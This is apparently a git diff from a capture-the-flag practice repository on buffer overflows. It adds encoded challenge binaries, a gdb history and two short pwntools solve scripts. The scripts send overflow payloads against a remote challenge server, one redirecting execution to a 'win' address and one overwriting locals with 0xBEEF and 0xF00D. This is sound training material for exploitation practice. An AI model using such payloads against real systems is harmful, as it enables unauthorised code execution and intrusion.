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

literal 0
HcmV?d00001

diff --git a/BOF/05_mini_game_arena/solve.py b/BOF/05_mini_game_arena/solve.py
new file mode 100644
index 0000000..e4ba05e
--- /dev/null
+++ b/BOF/05_mini_game_arena/solve.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF('./mini_game', checksec=False)
+
+#p = process(elf.path)
+p = remote('offsec.m0lecon.it', 13509)
+# Your exploit here
+OFFSET = 72
+win = 0x4011fb
+payload = flat(
+    b'A'*OFFSET,
+    win,
+)
+p.send(payload)
+#p.send(b'cat flag\n')
+#p.recv()
+p.interactive()
diff --git a/BOF/06_cosmic_burger_joint/.gdb_history b/BOF/06_cosmic_burger_joint/.gdb_history
new file mode 100644
index 0000000..2451afd
--- /dev/null
+++ b/BOF/06_cosmic_burger_joint/.gdb_history
@@ -0,0 +1,4 @@
+run
+quit
+disass vuln
+quit
diff --git a/BOF/06_cosmic_burger_joint/cosmic_burger b/BOF/06_cosmic_burger_joint/cosmic_burger
new file mode 100755
index 0000000000000000000000000000000000000000..70a5e8156daa533ef91fade6184bd50a48498055
GIT binary patch
literal 19344
zcmeHPdvH|Oc|Uihl@|0CPeE+1448+bT?r%^Fft2BuyO&(25LLCec8ud?UvQ9diO3!
z9yg_-&X{7RxE<Sc?3rL@T6?B-LeoyiPGgtYsU2n-7rSXnrqh<DAp=v##;%)?#%BBb
z&N<&|_g1R=$UmLgqq*n%zTfva=Y03xz2`oTer;&i4xeENE;Zs#LDHpGg@m<Ybem>C
z!eWDHLcLO~5Ot7iC8qRYMW9vXqOXz$G+qNrev65jfqq88f+_cqDEZA+&ebaoQ=!K}
zetuGE*-QI$KbW$<)SgMsD5k7Sv{#RhX}KTe=2VxmKQ&NEC$-;8nzA2><oAO1dqMj#
zy+$2EVaoZWoY1yGkHbs5$q9w2*Dt00ymU~x38vHrmA#kU#Q&zfQSB!>RU9wnc9?Q|
zcf*hJ^4~4IoA1%>&9)y>I{!>{dPOLcj`jD3GKsECI$N0Rn%vOe)!!S;=Ys2G7pPw*
zHaezu?%6L8<{V)<jly?C$sCV#^R=Gr5C6@9@6=fD4Bz@n>vNx+9PWGN*s5b>L;WTn
zvY|rp_z+=vE*P?r`7oXnM~qe<VU1*fvihdSKl8Tz)_8J%v~}Z$$N3aeN>9BCa=Qm3
z@h~=%7*A<|Jd=ILEcnPQ`0oHWv3U#SXr}ly-kI<-z)fu4VghIrON1F#8b01hyhTA3
z^&CiK-yK#k+i%o(*n^9_?H-C1k|OUW(pfQ4aPwl!MwOq+yY@K2xq>S!3&&C1%DYj=
zwZ@~cgu-?lDB_b*E1AwlGwFwIG2x`MZc>mj9b^4s=dR&x+pTrMb-}(8zrI&k!~1qy
z2w;z;(TuZi_x4OKYwwH3GB!evjpwquElZisXh=ttfg_9l6lIBIpZG<Lna`iXk~C6N
zBMxZnPo8)Rhn-JkAXDMrHO|+$Hie(ozgvtS(Rd)N^o+B7af`y~n5KQr<x&~$V-WO8
z87|KQt-Dr+(>~>Ly$o+)5R{J(I*;ib;=;!P;e1|^j*kPvn+VY5td38YAN~y>)k|eK
zo!?x}mEjbN%eTsKeJPWw3uQRxj(w`Mnt^Htsu`$epqhbd2C5nOpJd=)TW<dM$kBHL
zk>mdFg@lMadd~F~FGP-hGw`|$Q|x;faB<}$s9TnW1=*)abM^bhVljDA$~0lS`p&dW
z6Sb?aP0KVPy86{=nI=M4&y?ii$}FNMTb2z98Nax4p+|1^$aNn1MzGTV#}#tVkA{!E
z{ZQoC_ajGtaBXzoP|vxZ^N|w+b?9bs!C%AlqhzpU*>9jzNWh7Kp8|=T@P9~T<8^ld
zQuC+8BQ<l1ms*w`A-mT#h5dPH-}f4kH8&#1u0_7_-j>KWuGd72HzIG}aOWeyqdGvK
zcu9?u{V9J(23~<$6mHueIXVy{HgfE;+ZZ`Mkc4pMdpC;3D+y%l4gZsnjR)adYM=bC
z9)^;b{qRF$_rdCA>g3mGN4!d0<k*{6{t0oQT|2Y(b*266%-Y|B_T+=Fml`?xZugr*
zA5-Kvhpx*8PWWHOe3;tVNRdwX-_hb)h{yL|KR)#Fu{QvJtl*c(=}J(U);258;wR)e
zbOBM6{^m;GbLGAt!WcmZ-p2q7YmX0IA85J;&O{q;>ZZRU<N2>>@hrrDX@&kDHSk*i
zPM$np8kTDGt7uelO~|X{)X3#|QaUqe0M$~>Ks5u^3{*2v%|JB+)eKZKP|ZL!1Jw-t
z|H%No@1b(9or&khZPU$}Zpt>d=knv}xVf$1jM<KPR}OEdI<=jdwe5s7%G+_rcFlaW
z5Vy_M-ILpfhIXtmqgkaLkB%WiJZ0N?sol}tJ-8+)r1d7VdvfKZ`G{64ajv*G6?IqT
z&8b|$F>?-Hb8Qj((3!aEOiXnqoi`mjnwaV|BX|$S=8k<h>LfOaP%NDd<x}vJp|Uww
zcGXFbrCbCWkL7~qK4;2|j^Sk-hGZ<QxdV?K1ifo9-!B#?L63l*20aN%w||#F4}hM(
zRxDls4SrB8;#O1mKP(no^~)-HZ%M^?_#R<Qwi-(t>jNjDBb;8qP9nywWH4ASU#+bG
z+l%e=dn&eQZr#zm_^y_Q!+|4W%aV<2*RQyR%*p=&Y!_iC9SKAs+{JbQ_$UFoP+N~<
z`vC3Pgbg*fe$ltRsm}KRdZhaDhk*MrmcOmgzg5!zCGa0Xzr0-kIjJV3TB;eSW}upZ
zY6hwqsAiy=focY-8K`F9=bQolj*h>Z)3+J&+dOKjk=xTZ1$d(+%j$WG()XBD`1`!2
zN)-I<*b*)CcY1W+K!x@HcB7ah`K<n!jlWUbpc($=?uyp)w{u@7Clvn1Zm|-@0!^7{
zH*rdT*QV}5ai63O=>CQZe*?Eji6Wu_#>2WJ-0y%+6o322?cc2Z+3sgWH9nY22=Dyl
zcw2Qmy!n$d=N-30QvOJf|EF5!ap>?rH^Se0djods{T<eHRMP{RPH5`&`!t!q!`!)j
z`zCYs{#YUF7R;XY!S%uJuKt1)*L{9nZ?L;J*t13}#Agvz?KqXz^ZFxCi?ilw^;Klc
zFAQni{34V$9n}^ydHPK#ecxTQiAbRSAcFd8>nA{30zM<Kmt<f44~Q6b`=#Vx2;0_L
zKOR?zwxsm)p91l3L^o?rbvVQ~692nPiLZGERnrrw5aI!ZXeU6PLKka$0&TD~sQLBv
z6igUjfl2=yvJV&!p}t-6t;RtZZjk(9<7wDzl)PzBf;LHhwQ&RZ9g^=hwgTTQ`3=U`
zfe%PNY&?cIVaZ2~t>Cvxe$=3&d7I?#Gw8eU!G&v~Jz(67ddK__>Xfk%bwu`a!nhaw
zu;g81C*t4LFa@tk;|}n<+wTT{#F&E3o|gN-f5CVR_(*`(FdQ|W2Xc4IAo$0OUjTl8
z)1yF68ZjWhv}h0NQ^so44|Lpz`n2&^uz67S;RWL$EFYQ^L4DTvd*Iewd`=)<GS<WL
zfb7pX<M)Bb0uKWDrtsH7?XT~kHs_xKRC`-<{jb8HW+j9gf&;Wis5f(HM*zGDe7!~L
zVdA9WUU1TI9E>!aCu+{XdhXo-o_qvV4eiV(;^sbs>M6-R4wI*e^9B6$MLG_%BwClD
zXk~^BwM^9g1YrF$HFOZX1-O=)5euF|Z7lE;dI@ZUsQVV|>JA!&{DkcQ|2Dzj@e$mF
zQ$V@beI8=nUTM6J&|fEyrvTQHVJ&4&EL?@k=#*{v^-ue9QlJ>mE{Y<s(NGs`SBQL|
zBQ?(>VB;6THnxwW_C1kl+ymOArBvf{kecVdfF^xUgcp~M1V7vz^doHe>-eO!AyP4(
z6-JY&Y2MUXdq=~@hT(Y|VC-8V8XE3wsKF;3H7%l{Gcb&9*7^kzoQ|+=P{tT+(Ad%;
z0sqF%##J4|^EP)FFssMTYTk@1R=_ZZ=Mgfe6aFDYpW7?jt3!y+=HYo;I>@Yne$*S4
z#!$h1fSPWXjW)L#E1Tyv)GS-Ntj%bzZ^f0P1sy}MR^3(n{<QT;+xA-}nK#d<X>Mpx
zJ*D>NPj?*qxzuerXw~P1L7~SYL24<y_z`q&QMon46mxO8f`*Pnmj_{6jO}aK{J1XB
z$!QqI&zhTvU|-Xx@nDw8i_mXE{$p(4#a6`TGnV;U0!P6KSv8XJ0#v@6P}QuU>NZrh
z>#6cLi#a~t!wdcXqk;2*^L_(c)1ChIKP&kChc90ay!gYwe1A*e%l^P-|8o5N8m_;C
z$Y%eX!eyw8ANm`2!TC%6#xMDe`+ZngU|7Q=){fy_Ls)?@V&$WUY|G9jL_U>sT$6s7
z^H}g;xk9dnAd|yR+O@3-7mFg2ndn$v`eA8>6^rI=p&lR$ES_)<+Ky7v^IsX%N;)<k
z0_QEc62o>26VvN5=&3ZXw!k8ZF;iC50r_ZISeab>Ag!}8xA)wxuV`l1xLe5D17mj9
zcJTDN3$4ae18VV)*)?W%jdYt`$!x9*D>~u_yC$5RYscN312CGO%EnVpE}JXly9(LE
z>1?9QrG*)JD3y6U6V0dCDV@tg5l@!M!ipChE1t^~#<Rl8WfE2{nZ!a9QOM@gV_7_Q
zkEf!JI8?}F#q^L$N*Ws_RHaH-GUb#RxjJP!)iSSEAzR4XiFMLLCRFYLxKrwBkLfij
zr5tCl<OGXMCZdTxy*Ddb)(c;zo1qvMjiA35yBlj=GIlnHA*N^<j5JFpY%39Uqu9H-
z1TA2JF_}^)klw<CIt0`b8+CA~{>EV*Kcp;W-_?)~$$WFtD2zP(q*5);(W`Qxp}mi`
zLMgoU2t_k7+X)TY`Gan5A~cdr+DP~zd#{cCk#?s-BZq7!V@H$IDvNd2XfBg>bJHf7
zXw2&Fv0}MoXgrEFI_YS}4q?z441dhdhr0W^)C-L+^+H3Q2*J1r74i<PItz`(;~^Yz
zR)4Qvdp4FWgnHJ8(%E>XfHX-%E&ON0SQ?9vKHVhbPEFXAhIFzd>|`({qz*LiI)%6^
zPi844(m6%ZO)&pe!B32+6(7*=QbnPei~-H#xIj@cWv%91GuhL;-G|jkt$J#y&7~jV
zVGq7u+w*-B+Yf^=u)Zr2RtWWv3eBbru~6`RkOWaZf{o(yeHi19fiZA5!}nE;(^O@q
z{^N&#M*Pb%&V12*3rCoyGsU6%Dnl$1-ur^TkZx$DbK0M{i`WdYxO9KT+V{Zd*#bk7
zHXtEp1)_viz-L-VN3&d0;2IXLblL=brua0IY)3x5Q<YKRGp)Oe0dGb8R!{si#qqTX
zzR%^>b22_l)AS3o;7{uK-u|BfZce+GxIY5k=IaoApTvq+38xWjCz{Yw`8M#G^6(G9
zTX7tYhNW4ldPdr}meyV0sx|+t?M;vU``X?+Df~#{rLZL?;8Xqg=5s!9vt%{R1cBc&
zEtWW%bGQ5O^ucqVIYKx<o>B0eaX)a{zu~Y7fw`9|d*hDV6U6nvipJ8G8yyn>@@^rS
z#BbsB3P;Nwx8k(M5m$aIk+a4!xmYw~C2-BnThYR#z&qWEjP2TqVE4=xw8%1TMI9$P
zh0B`jOo^lu9mj>IFg`v7momwMrCVW2lN9vFvUc3Fb@z}pv}e%5%F4m}_iWugyd5y6
z57tmbYa@gA2y5rAk!@RdStC1k>>b)??c2I-*AP6s%Rs}tzVlPobgE^fC2Lv@N*D7A
zKu!nbHL?P>Y;|d+;p<hY6?%1fuYizYT#eNVQuMiUIjNP%=d2Xo?$c6Jy0p^5SBvHl
za^Y)bAa(7J<?}k2TKcM%%vM@jSi{PBrNyl?u2`*HEn69Y_8HCkXznN1)>f!RFh4bp
zX#uF~D4Jpp^CjDv5J7w-U<YxL4PrVsVLR?r85Ap|u?9Sy(9qUx!<f{K32C0fY)%9d
zQ&}{jDCV$IgXuyZ^ScVcg3hrsQF74SM8*|C+5aHe;8+eKG5D}T1YLU)qTG8yCnxu1
z&`#;YHI+a#mQ)ON+$s;|(Nq-QaiDWF%L-zDh#*dwahwOh>{ww8mQk9Pu$ay!bIeC$
zF~>f{64t@n%p-%$5{#Yf@Ok}zr1YE;KVi7`s^b0s5d54{tEDaTM3-Z$$HxA%{T~Ff
zrBeDmQljVwE%*2SKLq-2qrC9%J!3S_DEH@i4pWm2HTC-63;f4;w#fbG=dVnAwO^g4
z-u_2{<5sscettg7l&-f_sE@?5KiyJONn@j_8Mn{Rdztd{U9zR3!zlsvuVABRr|i$q
zOPTWi<NmW9Q+g;u&th5T=dnz?bxYp<Ygn8BLpf!Cem=~UpAU2U-tj-J{kQ3W{Jfdz
zq{hjga_04a4jAQx<Cm_J`g%#ncX{#d|7W2r_cyg4(*xzs;Q2Dl^m&i}5v^d#b{vLf
zre{6=C$)m<C_8G(eoSBX_+QcrrV-vT9)Aw|=N^Ba=P~8?9Bl8+AI*m;f2C$jZK<jE
zhJ^Q@wi4e4Q{msKHJT2xp{CyU|IXtd(SA(d_4s?+zYIMdrIr4N0N-cu|1a^{v&{4Z
z__mb!^L@?fE`TU(r=)3_@lT+jV^`mvmF_qA|Iu8d<e<>`M}_@(|Nj9nGGTvyzjG=?
z)_6{>NU3Ijrgd;G_ZMMp+N~(J!vWZjWqRmE7`JbRm8MnuYr^KjEOCly)9rih*k7ly
z<VAg@!gPuDSLk#-FiZRF$Chhm@gLXzukpaNgV(=r7XOgGaM0uJ^5PN2_F4R&>{DK^
zmOF#@`j2RTZ~peug%#z+(ut{L_GkLJS^ULDWxtsXl~`(@VWOTUq-9vWJrEo83A-F9
r-JkLC!`DB0KH*8R^q;&_5|Q!*=XRBr?saDNzZ6y$zwB}Fh~hs0<bin8

literal 0
HcmV?d00001

diff --git a/BOF/06_cosmic_burger_joint/solve.py b/BOF/06_cosmic_burger_joint/solve.py
new file mode 100644
index 0000000..47a938b
--- /dev/null
+++ b/BOF/06_cosmic_burger_joint/solve.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./cosmic_burger", checksec=False)
+
+p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13529)
+# Your exploit here
+OFFSET = 40
+#   mov    eax,DWORD PTR [rbp-0x4]
+#   cmp    eax,0xbeef
+#   jne    0x12f2 <vuln+196>
+#   mov    eax,DWORD PTR [rbp-0x8]
+#   cmp    eax,0xf00d
+first = 0xBEEF
+second = 0xF00D
+payload = flat(
+    b"A" * OFFSET,
+    p32(second),
+    p32(first),
+)
+p.send(payload)
+p.interactive()